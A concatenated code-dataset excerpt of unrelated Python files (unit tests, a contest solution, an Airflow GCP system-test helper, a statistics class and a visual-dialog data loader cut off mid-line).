+{"seq_id":"622558863","text":"import unittest\nfrom city_functions import city_country\n\n\nclass CityCountryTestCase(unittest.TestCase):\n '''To test the function of city_country'''\n\n def test_city_country(self):\n '''Testing function 1'''\n\n description = city_country('Beijing', 'China')\n self.assertEqual('Beijing, China', description)\n\n def test_city_country_population(self):\n '''Testing function 2'''\n\n description = city_country('Beijing', 'China', population=30000000)\n self.assertEqual('Beijing, China - population 30000000', description)\n\n\nunittest.main()","sub_path":"Python Practice/Python编程:从入门到实践/第11章/test_cities.py","file_name":"test_cities.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"67459426","text":"#!/usr/bin/env python3\nimport sys\nimport math\n\n\ndef solve(A: int, B: int, W: int):\n w = W * 1000\n\n max = 0\n min = 0\n\n c = w // B\n d = c * B\n # print(c, d)\n if d == w:\n min = c\n else:\n min = c + 1\n\n e = w // A\n f = e * A\n # print(e, f, w- f, (w-f)/e)\n if (w-f)/e > B- A:\n print(\"UNSATISFIABLE\")\n else:\n print(min, e)\n\n return\n\n\n# Generated by 1.1.7.1 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n A = int(next(tokens)) # type: int\n B = int(next(tokens)) # type: int\n W = int(next(tokens)) # type: int\n solve(A, B, W)\n\nif __name__ == '__main__':\n main()\n","sub_path":"abc/abc195/B/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"156530429","text":"\"\"\"\nAuthor: Matt Tarantino\nDescription: This application will prompt the user to enter 3 inputs\nand evaluate the inputs to return the max in a print statement.\n\"\"\"\n\n#Requests inputs from user. If an error occurs, a message\n#will be returned to the user and the script will exit.\ntry:\n input1 = input('Please enter the first value: ')\n input2 = input('Please enter the second value: ')\n input3 = input('Please enter the third value: ')\nexcept EOFError:\n print('EOF command given. Quitting...bye!')\n exit()\nexcept:\n print('This input is invalid! Please try again.')\n exit()\n\nif input1.isspace() or input2.isspace() or input3.isspace():\n print('One or more of your inputs contained only spaces. Please try again with valid inputs (letters, numbers, strings)!')\n exit()\n\n#Custom defined function that takes 3 parameters and compares them to return\n#the max of the 3 parameters.\ndef maxOfThree(first, second, third):\n max = first\n\n if second > first:\n max = second\n\n if third > max:\n max = third\n\n #Need to check second against third incase the first if statement did\n #not execute.\n if second > third:\n max = second\n\n return max\n\n#calls the function and saves the response to a variable called max\n#(used in print).\nmax = maxOfThree(input1, input2, input3)\n\nprint('The maximum of ' + input1 + ' ' + input2 + ' ' + input3 + ' is ' + max)\n","sub_path":"p3/p3-mtarantino.py","file_name":"p3-mtarantino.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"623004222","text":"# -*- coding: utf-8 -*-\n#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\nimport os\nimport subprocess\nimport unittest\nfrom glob import glob\nfrom shutil import move\nfrom tempfile import mkdtemp\n\nfrom airflow.utils import db as db_utils\nfrom airflow import models, AirflowException, LoggingMixin\nfrom airflow.utils.timezone import datetime\nfrom tests.contrib.utils.gcp_authenticator import GcpAuthenticator\nfrom tests.contrib.utils.run_once_decorator import run_once\n\nAIRFLOW_MAIN_FOLDER = os.path.realpath(os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n os.pardir, os.pardir, os.pardir))\n\nAIRFLOW_PARENT_FOLDER = os.path.realpath(os.path.join(AIRFLOW_MAIN_FOLDER,\n os.pardir, os.pardir, os.pardir))\nENV_FILE_RETRIEVER = os.path.join(AIRFLOW_PARENT_FOLDER,\n \"get_system_test_environment_variables.py\")\n\n\n# Retrieve environment variables from parent directory retriever - it should be\n# in the path ${AIRFLOW_SOURCE_DIR}/../../get_system_test_environment_variables.py\n# and it should print all the variables in form of key=value to the stdout\nclass RetrieveVariables:\n @staticmethod\n @run_once\n def retrieve_variables():\n if os.path.isfile(ENV_FILE_RETRIEVER):\n if os.environ.get('AIRFLOW__CORE__UNIT_TEST_MODE'):\n raise Exception(\"Please unset the AIRFLOW__CORE__UNIT_TEST_MODE\")\n variables = subprocess.check_output([ENV_FILE_RETRIEVER]).decode(\"utf-8\")\n print(\"Applying variables retrieved\")\n for line in variables.split(\"\\n\"):\n try:\n variable, key = line.split(\"=\")\n except ValueError:\n continue\n print(\"{}={}\".format(variable, key))\n os.environ[variable] = key\n\n\nRetrieveVariables.retrieve_variables()\n\nDEFAULT_DATE = datetime(2015, 1, 1)\n\nCONTRIB_OPERATORS_EXAMPLES_DAG_FOLDER = os.path.join(\n AIRFLOW_MAIN_FOLDER, \"airflow\", \"contrib\", \"example_dags\")\n\nOPERATORS_EXAMPLES_DAG_FOLDER = os.path.join(\n AIRFLOW_MAIN_FOLDER, \"airflow\", \"example_dags\")\n\nAIRFLOW_HOME = os.environ.get('AIRFLOW_HOME',\n os.path.join(os.path.expanduser('~'), 'airflow'))\n\nDAG_FOLDER = os.path.join(AIRFLOW_HOME, \"dags\")\n\n\nSKIP_TEST_WARNING = \"\"\"\nThe test is only run when the test is run in with GCP-system-tests enabled\nenvironment. You can enable it in one of two ways:\n\n* Set GCP_CONFIG_DIR environment variable to point to the GCP configuration\n directory which keeps variables.env file with environment variables to set\n and keys directory which keeps service account keys in .json format\n* Run this test within automated environment variable workspace where\n config directory is checked out next to the airflow one.\n\n\"\"\".format(__file__)\n\n\nclass BaseGcpSystemTestCase(unittest.TestCase, LoggingMixin):\n def __init__(self,\n method_name,\n gcp_key,\n project_extra=None):\n super().__init__(methodName=method_name)\n self.gcp_authenticator = GcpAuthenticator(gcp_key=gcp_key,\n project_extra=project_extra)\n self.setup_called = False\n\n @staticmethod\n def skip_check(key_name):\n return GcpAuthenticator(key_name).full_key_path is None\n\n def setUp(self):\n self.gcp_authenticator.gcp_store_authentication()\n self.gcp_authenticator.gcp_authenticate()\n # We checked that authentication works. Ne we revoke it to make\n # sure we are not relying on the default authentication\n self.gcp_authenticator.gcp_revoke_authentication()\n self.setup_called = True\n\n # noinspection PyPep8Naming\n def tearDown(self):\n self.gcp_authenticator.gcp_restore_authentication()\n\n\nclass DagGcpSystemTestCase(BaseGcpSystemTestCase):\n def __init__(self,\n method_name,\n gcp_key,\n dag_id=None,\n dag_name=None,\n require_local_executor=False,\n example_dags_folder=CONTRIB_OPERATORS_EXAMPLES_DAG_FOLDER,\n project_extra=None):\n super().__init__(method_name=method_name,\n gcp_key=gcp_key,\n project_extra=project_extra)\n self.dag_id = dag_id\n self.dag_name = self.dag_id + '.py' if not dag_name else dag_name\n self.example_dags_folder = example_dags_folder\n self.require_local_executor = require_local_executor\n self.temp_dir = None\n\n @staticmethod\n def _get_dag_folder():\n return DAG_FOLDER\n\n @staticmethod\n def _get_files_to_link(path):\n \"\"\"\n Returns all file names (note - file names not paths)\n that have the same base name as the .py dag file (for example dag_name.sql etc.)\n :param path: path to the dag file.\n :return: list of files matching the base name\n \"\"\"\n prefix, ext = os.path.splitext(path)\n assert ext == '.py', \"Dag name should be a .py file and is {} file\".format(ext)\n files_to_link = []\n for file in glob(prefix + \".*\"):\n files_to_link.append(os.path.basename(file))\n return files_to_link\n\n def _symlink_dag_and_associated_files(self, remove=False):\n target_folder = self._get_dag_folder()\n source_path = os.path.join(self.example_dags_folder, self.dag_name)\n for file_name in self._get_files_to_link(source_path):\n source_path = os.path.join(self.example_dags_folder, file_name)\n target_path = os.path.join(target_folder, file_name)\n if remove:\n try:\n self.log.info(\"Remove symlink: %s -> %s\", target_path, source_path)\n os.remove(target_path)\n except OSError:\n pass\n else:\n if not os.path.exists(target_path):\n self.log.info(\"Symlink: %s -> %s \", target_path, source_path)\n os.symlink(source_path, target_path)\n else:\n self.log.info(\"Symlink %s already exists. Not symlinking it.\", target_path)\n\n def _store_dags_to_temporary_directory(self):\n dag_folder = self._get_dag_folder()\n self.temp_dir = mkdtemp()\n self.log.info(\"Storing DAGS from %s to temporary directory %s\", dag_folder, self.temp_dir)\n try:\n os.mkdir(dag_folder)\n except OSError:\n pass\n for file in os.listdir(dag_folder):\n move(os.path.join(dag_folder, file), os.path.join(self.temp_dir, file))\n\n def _restore_dags_from_temporary_directory(self):\n dag_folder = self._get_dag_folder()\n self.log.info(\"Restoring DAGS to %s from temporary directory %s\", dag_folder, self.temp_dir)\n for file in os.listdir(self.temp_dir):\n move(os.path.join(self.temp_dir, file), os.path.join(dag_folder, file))\n\n def _run_dag(self, dag_id=None):\n self.log.info(\"Attempting to run DAG: %s\", self.dag_id)\n if not self.setup_called:\n raise AirflowException(\"Please make sure to call super.setUp() in your \"\n \"test class!\")\n dag_folder = self._get_dag_folder()\n dag_bag = models.DagBag(dag_folder=dag_folder, include_examples=False)\n self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}\n dag = dag_bag.get_dag(self.dag_id or dag_id)\n if dag is None:\n raise AirflowException(\n \"The Dag {} could not be found. It's either an import problem or \"\n \"the dag {} was not symlinked to the DAGs folder. \"\n \"The content of the {} folder is {}\".\n format(self.dag_id,\n self.dag_id + \".py\",\n dag_folder,\n os.listdir(dag_folder)))\n dag.clear(reset_dag_runs=True)\n dag.run(ignore_first_depends_on_past=True, verbose=True)\n\n @staticmethod\n def _check_local_executor_setup():\n postgres_path = os.path.realpath(os.path.join(\n AIRFLOW_MAIN_FOLDER,\n \"tests\", \"contrib\", \"operators\", \"postgres_local_executor.cfg\"))\n if postgres_path != os.environ.get('AIRFLOW_CONFIG'):\n raise AirflowException(\n \"\"\"\nPlease set AIRFLOW_CONFIG variable to '{}'\nand make sure you have a Postgres server running locally and\nairflow/airflow.db database created.\n\nYou can create the database via these commands:\n'createuser root'\n'createdb airflow/airflow.db`\n\n\"\"\".format(postgres_path))\n\n # noinspection PyPep8Naming\n def setUp(self):\n if self.require_local_executor:\n self._check_local_executor_setup()\n try:\n # We want to avoid random errors while database got reset - those\n # Are apparently triggered by parser trying to parse DAGs while\n # The tables are dropped. We move the dags temporarily out of the dags folder\n # and move them back after reset\n self._store_dags_to_temporary_directory()\n try:\n db_utils.upgradedb()\n db_utils.resetdb()\n finally:\n self._restore_dags_from_temporary_directory()\n self._symlink_dag_and_associated_files()\n super().setUp()\n\n except Exception as e:\n # In case of any error during setup - restore the authentication\n self.gcp_authenticator.gcp_restore_authentication()\n raise e\n\n def tearDown(self):\n self._symlink_dag_and_associated_files(remove=True)\n super().tearDown()\n","sub_path":"tests/contrib/utils/base_gcp_system_test_case.py","file_name":"base_gcp_system_test_case.py","file_ext":"py","file_size_in_byte":10440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"442929566","text":"class Statistic():\n\n def __init__(self, courseID, an, promovability):\n self.courseID = courseID\n self.an = an\n self.promovability = promovability\n\n def toJson(self):\n\n jsonString = b'{'\n jsonString += b'\"courseID\":\"' + str(self.courseID).encode('ascii') + b'\",'\n jsonString += b'\"an\":\"' + str(self.an).encode('ascii') + b'\",'\n jsonString += b'\"promovability\":\"' + str(self.promovability).encode('ascii') + b'\"}'\n\n return jsonString\n\n def toSqlString(self):\n sqlString = \"'\"\n sqlString += str(self.courseID)+ \"','\"\n sqlString += str(self.an)+ \"','\"\n sqlString += str(self.promovability)+ \"'\"\n\n return sqlString","sub_path":"server/statistics/statistic.py","file_name":"statistic.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"160156005","text":"import json\nimport numpy as np\nimport random\nimport torch\nimport torch.nn.functional as F\nimport QBot\nimport json\nimport h5py\n\n\nclass DataLoader:\n\tdef __init__(self, dialog_loc, image_loc, param_loc):\n\t\tself.dialog_loc = dialog_loc\n\t\tself.image_loc = image_loc\n\t\tself.param_loc = param_loc\n\t\tself.dialog = h5py.File(dialog_loc, 'r')\n\t\tself.imageAll = h5py.File(image_loc, 'r')\n\t\twith open(param_loc, 'rb') as input_json:\n\t\t\tself.params = json.loads(input_json.read().decode('utf-8'))\n\t\tself.processData()\n\n\tdef getCNNOutputs(self):\n\t\tall_images = {'train' : {}, 'val' : {}}\n\t\tcnn_features = []\n\t\twith open('../visdial_params.json', 'rb') as input_json:\n\t\t\tself.cnnParams = json.loads(input_json.read().decode('utf-8'))\n\t\tfor dataset in ['train','val']:\n\t\t\tfor index, img in enumerate(self.cnnParams['img_'+dataset]):\n\t\t\t\tall_images[dataset][int(img['imgId'])] = index\n\t\tself.cnnFeatures = h5py.File('../vdl_img_vgg.h5', 'r')\n\t\toutput = h5py.File('../vgg_cnn_features.h5', 'w')\n\t\tfor dataset in ['test', 'val', 'train']:\n\t\t\tfeatures = np.zeros((len(self.params['unique_img_'+dataset]), self.cnnFeatures['images_train'].shape[1], self.cnnFeatures['images_train'].shape[2], self.cnnFeatures['images_train'].shape[3]))\n\t\t\tprint (features.shape)\n\t\t\tif dataset == 'test':\n\t\t\t\tprint (self.cnnFeatures['images_val'].shape)\n\t\t\telse:\n\t\t\t\tprint (self.cnnFeatures['images_train'].shape)\n\t\t\tprint ()\n\t\t\tfor index, img_id in enumerate(self.params['unique_img_'+dataset]):\n\t\t\t\tif dataset == 'test':\n\t\t\t\t\tfeatures[index] = np.array(self.cnnFeatures['images_val'][all_images['val'][int(img_id)]])\n\t\t\t\telse:\n\t\t\t\t\tfeatures[index] = np.array(self.cnnFeatures['images_train'][all_images['train'][int(img_id)]])\n\t\t\toutput.create_dataset('img_'+dataset, data=features)\n\t\toutput.close()\n\n\n\tdef processParams(self):\n\t\tself.unique_img_train = self.params['unique_img_train']\n\t\tself.unique_img_test = self.params['unique_img_test']\n\t\tself.unique_img_val = self.params['unique_img_val']\n\t\tself.ind2word = self.params['ind2word']\n\t\tself.ind2word = {int(key): value for key,value in self.ind2word.items()}\n\t\tself.word2ind = self.params['word2ind']\n\n\t\t#Add tokens\n\t\tself.START_TOKEN = ''\n\t\tself.END_TOKEN = ''\n\t\tself.PAD_TOKEN = ''\n\t\tself.START_INDEX = len(self.ind2word.keys()) + 1\n\t\tself.END_INDEX = len(self.ind2word.keys()) + 2\n\t\tself.PAD_INDEX = 0\n\n\t\tself.ind2word[self.PAD_INDEX] = self.PAD_TOKEN\n\t\tself.ind2word[self.START_INDEX] = self.START_TOKEN\n\t\tself.ind2word[self.END_INDEX] = self.END_TOKEN\n\n\t\tself.word2ind[self.PAD_TOKEN] = self.PAD_INDEX\n\t\tself.word2ind[self.START_TOKEN] = self.START_INDEX\n\t\tself.word2ind[self.END_TOKEN] = self.END_INDEX\n\n\tdef processQA(self):\n\t\tself.questions = {}\n\t\tself.questions_length = {}\n\t\tself.questions_count = {}\n\n\t\tself.answers = {}\n\t\tself.answers_length = {}\n\t\tself.answers_indexes = {}\n\n\t\tself.captions = {}\n\t\tself.captions_length = {}\n\n\t\tself.options = {}\n\t\tself.options_length = {}\n\t\tself.options_list = {}\n\t\tself.options_probs = {}\n\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.questions[dataset] = np.array(self.dialog['ques_'+dataset])\n\t\t\tself.questions_length[dataset] = np.array(self.dialog['ques_length_'+dataset])\n\t\t\tself.questions_count[dataset] = np.array(self.dialog['ques_count_'+dataset])\n\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.answers[dataset] = np.array(self.dialog['ans_'+dataset])\n\t\t\tself.answers_length[dataset] = np.array(self.dialog['ans_length_'+dataset])\n\t\t\tself.answers_indexes[dataset] = np.array(self.dialog['ans_index_'+dataset]) - 1\n\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.captions[dataset] = np.array(self.dialog['cap_'+dataset])\n\t\t\tself.captions_length[dataset] = np.array(self.dialog['cap_length_'+dataset])\n\n\t\tfor dataset in ['val','test']:\n\t\t\tself.options[dataset] = np.array(self.dialog['opt_'+dataset]) - 1\n\t\t\tself.options_length[dataset] = np.array(self.dialog['opt_length_'+dataset])\n\t\t\tself.options_list[dataset] = np.array(self.dialog['opt_list_'+dataset])\n\t\t\t# self.options_probs[dataset] = np.array(self.dialog['opt_len_'+dataset])\n\n\tdef processImage(self, normalize):\n\t\tself.images = {}\n\t\tself.image_pos = {}\n\t\tfor dataset in ['train','val','test']:\n\t\t\tif normalize:\n\t\t\t\tself.images[dataset] = np.array(self.imageAll['images_'+dataset]) / (np.sqrt(np.sum(np.square(self.imageAll['images_'+dataset]), 1)))[:,None]\n\t\t\telse:\n\t\t\t\tself.images[dataset] = np.array(self.imageAll['images_'+dataset])\n\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.image_pos[dataset] = np.array(self.dialog['img_pos_'+dataset])\n\n\tdef processHistory(self, maxHistoryLen=60):\n\t\tself.history = {}\n\t\tself.history_length = {}\n\n\t\tfor dataset in ['train', 'val', 'test']:\n\t\t\tself.history[dataset] = np.zeros((self.datasize[dataset], self.dialogLength, self.questionLength+self.answerLength), dtype=np.int64)\n\t\t\tself.history_length[dataset] = np.zeros((self.datasize[dataset], self.dialogLength), dtype=np.int64)\n\n\t\t\tfor example in range(self.datasize[dataset]):\n\t\t\t\t#First round has caption as history\n\t\t\t\tcaptionLength = min(self.captions_length[dataset][example], self.questionLength+self.answerLength)\n\t\t\t\tself.history[dataset][example, 0, :captionLength] = self.captions[dataset][example, :captionLength]\n\t\t\t\tself.history_length[dataset][example, 0] = captionLength\n\n\t\t\t\t#Other Rounds have previous Q + A\n\t\t\t\tfor turn in range(self.dialogLength-1):\n\t\t\t\t\tlenQ = self.questions_length[dataset][example, turn]\n\t\t\t\t\tlenA = self.answers_length[dataset][example, turn]\n\t\t\t\t\tself.history[dataset][example, turn + 1, :lenQ] = self.questions[dataset][example, turn, :lenQ]\n\t\t\t\t\tself.history[dataset][example, turn + 1, lenQ:lenQ+lenA] = self.answers[dataset][example, turn, :lenA]\n\t\t\t\t\tself.history_length[dataset][example, turn + 1] = lenQ + lenA\n\n\tdef processQHistory(self, maxHistoryLen=60):\n\t\tself.Qhistory = {}\n\t\tself.Qhistory_length = {}\n\n\t\tfor dataset in ['train', 'val', 'test']:\n\t\t\tself.Qhistory[dataset] = np.zeros((self.datasize[dataset], self.dialogLength, self.questionLength+self.answerLength), dtype=np.int64)\n\t\t\tself.Qhistory_length[dataset] = np.zeros((self.datasize[dataset], self.dialogLength), dtype=np.int64)\n\n\t\t\tfor example in range(self.datasize[dataset]):\n\t\t\t\t#First round has caption as history\n\t\t\t\tcaptionLength = min(self.captions_length[dataset][example], self.questionLength+self.answerLength)\n\t\t\t\tself.Qhistory[dataset][example, 0, :captionLength] = self.captions[dataset][example, :captionLength]\n\t\t\t\tself.Qhistory_length[dataset][example, 0] = captionLength\n\n\t\t\t\tlenQ = self.questions_length[dataset][example, 0]\n\t\t\t\t# lenA = self.answers_length[dataset][example, 0]\n\t\t\t\tself.Qhistory[dataset][example, 1, :lenQ] = self.questions[dataset][example, 0, :lenQ]\n\t\t\t\t# self.history[dataset][example, 1, lenQ:lenQ+lenA] = self.answers[dataset][example, turn, :lenA]\n\t\t\t\tself.Qhistory_length[dataset][example, 1] = lenQ\n\t\t\t\t#Other Rounds have previous Q + A\n\t\t\t\tfor turn in range(1,self.dialogLength-1):\n\t\t\t\t\tlenQ = self.questions_length[dataset][example, turn]\n\t\t\t\t\tlenA = self.answers_length[dataset][example, turn - 1]\n\t\t\t\t\tself.Qhistory[dataset][example, turn + 1, :lenQ] = self.questions[dataset][example, turn, :lenQ]\n\t\t\t\t\tself.Qhistory[dataset][example, turn + 1, lenQ:lenQ+lenA] = self.answers[dataset][example, turn - 1, :lenA]\n\t\t\t\t\tself.Qhistory_length[dataset][example, turn + 1] = lenQ + lenA\n\n\n\tdef processAnswers(self):\n\t\tself.answers_input = {}\n\t\tself.answers_output = {}\n\t\tself.appended_answers_length = {}\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.answers_input[dataset] = np.zeros((self.datasize[dataset], self.dialogLength, self.answerLength + 1), dtype=np.int64)\n\t\t\tself.answers_output[dataset] = np.zeros((self.datasize[dataset], self.dialogLength, self.answerLength + 1), dtype=np.int64)\n\n\t\t\tfor example in range(self.datasize[dataset]):\n\t\t\t\tfor turn in range(self.dialogLength):\n\t\t\t\t\tanswerLength = self.answers_length[dataset][example, turn]\n\t\t\t\t\tself.answers_input[dataset][example,turn,0] = self.START_INDEX\n\t\t\t\t\tself.answers_input[dataset][example,turn,1:answerLength+1] = self.answers[dataset][example,turn,:answerLength]\n\n\t\t\t\t\tself.answers_output[dataset][example, turn, :answerLength] = self.answers[dataset][example,turn,:answerLength]\n\t\t\t\t\tself.answers_output[dataset][example, turn, answerLength] = self.END_INDEX\n\n\t\t\tself.appended_answers_length[dataset] = self.answers_length[dataset] + 1\n\n\tdef processQuestions(self):\n\t\tself.questions_input = {}\n\t\tself.questions_output = {}\n\t\tself.appended_questions_length = {}\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.questions_input[dataset] = np.zeros((self.datasize[dataset], self.dialogLength, self.questionLength + 1), dtype=np.int64)\n\t\t\tself.questions_output[dataset] = np.zeros((self.datasize[dataset], self.dialogLength, self.questionLength + 1), dtype=np.int64)\n\n\t\t\tfor example in range(self.datasize[dataset]):\n\t\t\t\tfor turn in range(self.dialogLength):\n\t\t\t\t\tquestionLength = self.questions_length[dataset][example, turn]\n\t\t\t\t\tself.questions_input[dataset][example,turn,0] = self.START_INDEX\n\t\t\t\t\tself.questions_input[dataset][example,turn,1:questionLength+1] = self.questions[dataset][example,turn,:questionLength]\n\n\t\t\t\t\tself.questions_output[dataset][example, turn, :questionLength] = self.questions[dataset][example,turn,:questionLength]\n\t\t\t\t\tself.questions_output[dataset][example, turn, questionLength] = self.END_INDEX\n\n\t\t\tself.appended_questions_length[dataset] = self.questions_length[dataset] + 1\n\n\tdef processOptions(self):\n\t\tself.options_input = {}\n\t\tself.options_output = {}\n\t\tself.appended_options_length = {}\n\t\tfor dataset in ['val','test']:\n\t\t\tself.options_input[dataset] = np.zeros((self.options_list[dataset].shape[0], self.answers[dataset].shape[2] + 1), dtype=np.int64)\n\t\t\tself.options_output[dataset] = np.zeros((self.options_list[dataset].shape[0], self.answers[dataset].shape[2] + 1), dtype=np.int64)\n\n\t\t\tfor example in range(self.options_list[dataset].shape[0]):\n\t\t\t\toptionLength = self.options_length[dataset][example]\n\t\t\t\tself.options_input[dataset][example, 0] = self.START_INDEX\n\t\t\t\tself.options_input[dataset][example, 1:optionLength+1] = self.options_list[dataset][example, :optionLength]\n\n\t\t\t\tself.options_output[dataset][example, :optionLength] = self.options_list[dataset][example, :optionLength]\n\t\t\t\tself.options_output[dataset][example, optionLength] = self.END_INDEX\n\n\t\t\tself.appended_options_length[dataset] = self.options_length[dataset] + 1\n\n\n\tdef processData(self, normalize=True):\n\t\tself.isRightAligned = False\n\t\tself.processParams()\n\t\tself.processQA()\n\t\tself.processImage(normalize)\n\t\tself.datasize = {}\n\t\tfor dataset in ['train','val','test']:\n\t\t\tself.datasize[dataset] = self.questions[dataset].shape[0]\n\t\tself.dialogLength = self.questions['train'].shape[1]\n\t\tself.questionLength = self.questions['train'].shape[2]\n\t\tself.answerLength = self.answers['train'].shape[2]\n\t\tself.processAnswers()\n\t\tself.processQuestions()\n\t\tself.processHistory()\n\t\tself.processQHistory()\n\t\tself.processOptions()\n\t\t# self.rightAlignAll()\n\n\tdef getBatch(self, indexes, dataset):\n\t\tbatch = {}\n\t\tbatch['questions_length'] = self.questions_length[dataset][indexes,:]\n\t\tbatch_max_ques_length = np.max(batch['questions_length'])\n\t\tif self.isRightAligned:\n\t\t\tbatch['questions'] = self.questions[dataset][indexes,:,self.questions[dataset].shape[2] - batch_max_ques_length:]\n\t\telse:\n\t\t\tbatch['questions'] = self.questions[dataset][indexes,:,:batch_max_ques_length]\n\n\t\tbatch['history_length'] = self.history_length[dataset][indexes,:]\n\t\tbatch_max_history_length = np.max(batch['history_length'])\n\t\tif self.isRightAligned:\n\t\t\tbatch['history'] = self.history[dataset][indexes,:,self.history[dataset].shape[2] - batch_max_history_length:]\n\t\telse:\n\t\t\tbatch['history'] = self.history[dataset][indexes,:,:batch_max_history_length]\n\n\t\tbatch['images'] = self.images[dataset][self.image_pos[dataset][indexes],:]\n\n\t\tbatch['answers_length'] = self.appended_answers_length[dataset][indexes,:]\n\t\tbatch_max_answer_length = np.max(batch['answers_length'])\n\t\tbatch['answers_input'] = self.answers_input[dataset][indexes,:,:batch_max_answer_length]\n\t\tbatch['answers_output'] = self.answers_output[dataset][indexes,:,:batch_max_answer_length]\n\t\tbatch['answers_indexes'] = self.answers_indexes[dataset][indexes,:]\n\n\t\tif dataset == 'test' or dataset == 'val':\n\t\t\tbatch['options_indexes_array'] = self.options[dataset][indexes,:,:]\n\t\t\tbatch['options_indexes'] = np.reshape(batch['options_indexes_array'], (-1,))\n\t\t\tbatch['options_length'] = self.appended_options_length[dataset][batch['options_indexes']]\n\t\t\tbatch_max_option_length = np.max(batch['options_length'])\n\t\t\tbatch['options_input'] = self.options_input[dataset][batch['options_indexes'],:batch_max_option_length]\n\t\t\tbatch['options_output'] = self.options_output[dataset][batch['options_indexes'],:batch_max_option_length]\n\t\t\tbatch['options_length'] = np.reshape(batch['options_length'], (batch['options_indexes_array'].shape[0], batch['options_indexes_array'].shape[1], batch['options_indexes_array'].shape[2]))\n\t\t\tbatch['options_input'] = np.reshape(batch['options_input'], (batch['options_indexes_array'].shape[0], batch['options_indexes_array'].shape[1], batch['options_indexes_array'].shape[2], -1))\n\t\t\tbatch['options_output'] = np.reshape(batch['options_output'], (batch['options_indexes_array'].shape[0], batch['options_indexes_array'].shape[1], batch['options_indexes_array'].shape[2], -1))\n\t\treturn batch\n\n\tdef getQBatch(self, indexes, dataset):\n\t\tbatch = {}\n\t\tbatch['answers_length'] = np.zeros(shape=(len(indexes), self.dialogLength + 1), dtype=np.int64)\n\t\tbatch['answers_length'][:,1:] = self.answers_length[dataset][indexes,:]\n\t\tbatch['answers_length'][:,0] = 1\n\t\tbatch_max_answer_length = np.max(batch['answers_length'])\n\t\tbatch['answers'] = np.zeros(shape=(len(indexes), self.dialogLength + 1, batch_max_answer_length), dtype=np.int64)\n\t\tif self.isRightAligned:\n\t\t\tbatch['answers'][:,1:,:] = self.answers[dataset][indexes,:,self.answers[dataset].shape[2] - batch_max_answer_length:]\n\t\telse:\n\t\t\tbatch['answers'][:,1:,:] = self.answers[dataset][indexes,:,:batch_max_answer_length]\n\t\tbatch['history_length'] = self.Qhistory_length[dataset][indexes,:]\n\t\tbatch_max_history_length = np.max(batch['history_length'])\n\t\tif self.isRightAligned:\n\t\t\tbatch['history'] = self.Qhistory[dataset][indexes,:,self.history[dataset].shape[2] - batch_max_history_length:]\n\t\telse:\n\t\t\tbatch['history'] = self.Qhistory[dataset][indexes,:,:batch_max_history_length]\n\n\t\tbatch['images'] = self.images[dataset][self.image_pos[dataset][indexes],:]\n\n\t\tbatch['questions_length'] = self.appended_questions_length[dataset][indexes,:]\n\t\tbatch_max_ques_length = np.max(batch['questions_length'])\n\t\tbatch['questions_input'] = self.questions_input[dataset][indexes,:,:batch_max_ques_length]\n\t\tbatch['questions_output'] = self.questions_output[dataset][indexes,:,:batch_max_ques_length]\n\t\t# batch['answers_indexes'] = self.answers_indexes[dataset][indexes,:]\n\t\t#\n\t\t# if dataset == 'test' or dataset == 'val':\n\t\t# \tbatch['options_indexes_array'] = self.options[dataset][indexes,:,:]\n\t\t# \tbatch['options_indexes'] = np.reshape(batch['options_indexes_array'], (-1,))\n\t\t# \tbatch['options_length'] = self.appended_options_length[dataset][batch['options_indexes']]\n\t\t# \tbatch_max_option_length = np.max(batch['options_length'])\n\t\t# \tbatch['options_input'] = self.options_input[dataset][batch['options_indexes'],:batch_max_option_length]\n\t\t# \tbatch['options_output'] = self.options_output[dataset][batch['options_indexes'],:batch_max_option_length]\n\t\t# \tbatch['options_length'] = np.reshape(batch['options_length'], (batch['options_indexes_array'].shape[0], batch['options_indexes_array'].shape[1], batch['options_indexes_array'].shape[2]))\n\t\t# \tbatch['options_input'] = np.reshape(batch['options_input'], (batch['options_indexes_array'].shape[0], batch['options_indexes_array'].shape[1], batch['options_indexes_array'].shape[2], -1))\n\t\t# \tbatch['options_output'] = np.reshape(batch['options_output'], (batch['options_indexes_array'].shape[0], batch['options_indexes_array'].shape[1], batch['options_indexes_array'].shape[2], -1))\n\t\treturn batch\n\n\tdef rightAlignAll(self):\n\t\tself.isRightAligned = True\n\t\tfor dataset in ['train', 'test', 'val']:\n\t\t\tself.questions[dataset] = self.rightAlign(self.questions[dataset], self.questions_length[dataset])\n\t\t\tself.history[dataset] = self.rightAlign(self.history[dataset], self.history_length[dataset])\n\n\tdef rightAlign(self, sequences, length):\n\t\trightAlign = np.zeros_like(sequences)\n\t\tdims = len(sequences.shape)\n\t\tif dims == 3:\n\t\t\tfor example in range(sequences.shape[0]):\n\t\t\t\tfor turn in range(sequences.shape[1]):\n\t\t\t\t\trightAlign[example,turn, sequences.shape[2] - length[example, 